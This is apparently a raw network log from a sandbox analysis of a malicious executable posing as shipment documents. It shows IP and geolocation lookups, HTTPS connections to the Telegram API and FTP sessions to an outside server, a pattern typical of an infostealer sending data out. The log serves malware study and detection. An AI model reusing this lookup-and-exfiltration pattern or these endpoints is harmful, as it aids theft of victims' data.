                                                    Oct 11, 2024 09:35:26.320190907 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.320231915 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.320909977 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.321253061 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.321271896 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.361536980 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.655930996 CEST8049756132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.657229900 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.657279015 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.657625914 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.657860041 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.657867908 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.705290079 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.789305925 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.791992903 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.792025089 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.934521914 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.934629917 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.938364029 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.961669922 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.974071980 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.975222111 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.979430914 CEST8049755132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.980226994 CEST8049759132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.982361078 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.982400894 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.983357906 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.988234997 CEST8049759132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.112709999 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.158407927 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.249295950 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.249306917 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.360826969 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.360909939 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.361068964 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.384385109 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.400655031 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.400836945 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.405425072 CEST8049760132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.405509949 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.405859947 CEST8049756132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.405917883 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.408684969 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.413464069 CEST8049760132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.674367905 CEST8049759132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.675632000 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.675678968 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.675847054 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.675996065 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.676014900 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.721035004 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.071233988 CEST8049760132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.073016882 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.073061943 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.073185921 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.073453903 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.073472977 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.111649990 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.133369923 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.135478020 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.135500908 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.278449059 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.278543949 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.278601885 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.279347897 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.283052921 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.284153938 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.288693905 CEST8049759132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.288758039 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.289472103 CEST8049763132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.289540052 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.289654970 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.295228958 CEST8049763132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.536572933 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.537975073 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.538007021 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.684468031 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.684572935 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.684621096 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.685015917 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.688519001 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.689522028 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.693902969 CEST8049760132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.693969011 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.694433928 CEST8049764132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.694508076 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.694603920 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.699481010 CEST8049764132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.953393936 CEST8049763132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.954476118 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.954511881 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.954582930 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.954791069 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.954807997 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.002127886 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:29.394510031 CEST8049764132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:29.395595074 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.395633936 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.395787954 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.396030903 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.396049976 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.418128014 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.419537067 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.419564962 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.439764977 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:29.560801029 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.560872078 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.561121941 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.561700106 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.577332020 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:29.582446098 CEST8049763132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:29.582602024 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:29.585438013 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:29.585545063 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:29.586013079 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:29.586555004 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:29.586594105 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:29.852252007 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.892411947 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.892436028 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.000144005 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.000262976 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.001717091 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.012231112 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.016028881 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.017163992 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.021065950 CEST8049764132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:30.021215916 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.023622990 CEST8049768132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:30.023682117 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.023770094 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.028537035 CEST8049768132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:30.230626106 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.230719090 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.232331991 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.232352972 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.232732058 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.234064102 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.275410891 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.479307890 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.479408026 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.479485035 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.485341072 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.688242912 CEST8049768132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:30.689893007 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.689960003 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.690047026 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.690274000 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.690288067 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.736502886 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:31.373198032 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:31.374777079 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:31.374804974 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:31.523684025 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:31.523796082 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:31.523894072 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:31.524333954 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:31.532440901 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:31.533176899 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:31.533231020 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:31.533718109 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:31.533718109 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:31.533763885 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:31.538187027 CEST8049768132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:31.538240910 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:32.159507036 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.159591913 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:32.160963058 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:32.160975933 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.161223888 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.168340921 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:32.211443901 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.442162991 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.442223072 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.442270994 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:32.445235014 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:35.949058056 CEST4973980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:36.125556946 CEST4920321192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:36.131467104 CEST2149203185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:36.131584883 CEST4920321192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:36.139403105 CEST4920321192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:36.144942045 CEST2149203185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:36.145025969 CEST4920321192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:37.784018040 CEST4974480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:37.930104971 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:37.936006069 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:37.936126947 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:38.569251060 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:38.569528103 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:38.576181889 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:38.792526960 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:38.792690039 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:38.799061060 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.098913908 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.099127054 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:39.104547024 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.320677042 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.320897102 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:39.327207088 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.653044939 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.653198004 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:39.660329103 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.875978947 CEST2149204185.230.141.85192.168.2.4
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Oct 11, 2024 09:35:16.010059118 CEST | 52047 | 53 | 192.168.2.4 | 1.1.1.1
                                                    Oct 11, 2024 09:35:16.016813993 CEST | 53 | 52047 | 1.1.1.1 | 192.168.2.4
                                                    Oct 11, 2024 09:35:17.360287905 CEST | 59773 | 53 | 192.168.2.4 | 1.1.1.1
                                                    Oct 11, 2024 09:35:17.367681980 CEST | 53 | 59773 | 1.1.1.1 | 192.168.2.4
                                                    Oct 11, 2024 09:35:29.577244043 CEST | 53575 | 53 | 192.168.2.4 | 1.1.1.1
                                                    Oct 11, 2024 09:35:29.584856033 CEST | 53 | 53575 | 1.1.1.1 | 192.168.2.4
                                                    Oct 11, 2024 09:35:33.619982958 CEST | 53 | 50058 | 1.1.1.1 | 192.168.2.4
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Oct 11, 2024 09:35:16.010059118 CEST | 192.168.2.4 | 1.1.1.1 | 0xd02a | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:17.360287905 CEST | 192.168.2.4 | 1.1.1.1 | 0x5f83 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:29.577244043 CEST | 192.168.2.4 | 1.1.1.1 | 0xdd29 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Oct 11, 2024 09:35:16.016813993 CEST | 1.1.1.1 | 192.168.2.4 | 0xd02a | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:16.016813993 CEST | 1.1.1.1 | 192.168.2.4 | 0xd02a | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:16.016813993 CEST | 1.1.1.1 | 192.168.2.4 | 0xd02a | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:16.016813993 CEST | 1.1.1.1 | 192.168.2.4 | 0xd02a | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:16.016813993 CEST | 1.1.1.1 | 192.168.2.4 | 0xd02a | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:16.016813993 CEST | 1.1.1.1 | 192.168.2.4 | 0xd02a | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:17.367681980 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f83 | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:17.367681980 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f83 | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                    Oct 11, 2024 09:35:29.584856033 CEST | 1.1.1.1 | 192.168.2.4 | 0xdd29 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                    • reallyfreegeoip.org
                                                    • api.telegram.org
                                                    • checkip.dyndns.org
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:16.036529064 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:16.912301064 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:16 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: c4874257964a303b893ea68cb1d0ec0b
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Oct 11, 2024 09:35:16.955323935 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:17.159961939 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:17 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 2bb44a9af14d57792bf6214d8e8e14d5
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Oct 11, 2024 09:35:19.588538885 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:19.794353008 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 962865c0a07ad0e17457b6d349faa106
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.4 | 49737 | 132.226.247.73 | 80 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 11, 2024 09:35:19.655952930 CEST | 151 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:20.348445892 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: e73e8903fdfe815900b754a756349417
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Oct 11, 2024 09:35:20.352443933 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:20.562414885 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 4bd78b2ea030520662e3fe02a1b5ff89
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Oct 11, 2024 09:35:21.261548042 CEST | 127 | OUT | GET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:21.471304893 CEST | 320 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:21 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 5074595cc6ece634abbf1a5aa3f65b70
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
